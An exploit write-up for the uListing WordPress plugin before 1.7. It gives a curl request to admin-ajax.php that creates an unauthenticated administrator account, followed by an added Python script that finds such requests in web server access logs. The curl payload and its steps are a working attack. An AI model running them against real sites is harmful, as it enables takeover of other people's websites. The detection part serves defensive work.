WordPress Plugin uListing < 1.7 - Unauthenticated Account Creation

Reference: Nintechnet

  1. Check whether the redacted site is vulnerable by accessing:
    http://redacted.com/wp-admin/admin-ajax.php?action=stm_listing_register

Note: not all sites are vulnerable.

  2. Send a JSON request to the redacted site:
    curl "https://redacted.com/wp-admin/admin-ajax.php?action=stm_listing_register" -d '{"email": "Your Email","first_name":"Rinto","last_name": "ARRRR", "login": "YOUR USERNAME", "password": "YOUR PASSWORD", "password_repeat":"YOUR PASSWORD","role":"administrator"}' -v

  3. Log in to the admin panel.
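
For defenders, the requests in the steps above leave a recognisable trace in web server access logs. The following is an added example, not part of the original write-up or the plugin's code: it assumes combined-format access logs, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ACTION = "stm_listing_register"  # AJAX action named in the steps above

# Combined log format: client IP, timestamp, method, request target, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def find_registration_hits(lines):
    """Map client IP -> [(timestamp, method, status)] for requests that call
    the registration action through admin-ajax.php."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes, so action=stm%5Flisting_register matches too
        if ACTION in parse_qs(url.query).get("action", []):
            hits[m["ip"]].append((m["ts"], m["method"], int(m["status"])))
    return dict(hits)

def successful_posts(hits):
    """Keep only POSTs answered 2xx, the requests that could have created an
    account. The JSON body (and its "role" field) is not in the access log."""
    out = {}
    for ip, reqs in hits.items():
        posts = [r for r in reqs if r[1] == "POST" and 200 <= r[2] < 300]
        if posts:
            out[ip] = posts
    return out

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [10/Mar/2021:09:14:02 +0000] "GET /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/1.1" 200 58 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Mar/2021:09:14:31 +0000] "POST /wp-admin/admin-ajax.php?action=stm%5Flisting_register HTTP/1.1" 200 112 "-" "curl/7.68.0"',
    '203.0.113.20 - - [10/Mar/2021:09:15:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 47 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2021:09:16:10 +0000] "POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/1.1" 403 0 "-" "python-requests/2.25"',
]

if __name__ == "__main__":
    for ip, reqs in successful_posts(find_registration_hits(SAMPLE)).items():
        print(ip, reqs)
```

Because the requested role is only in the POST body, each hit should be correlated with the `user_registered` time of administrator accounts on the site.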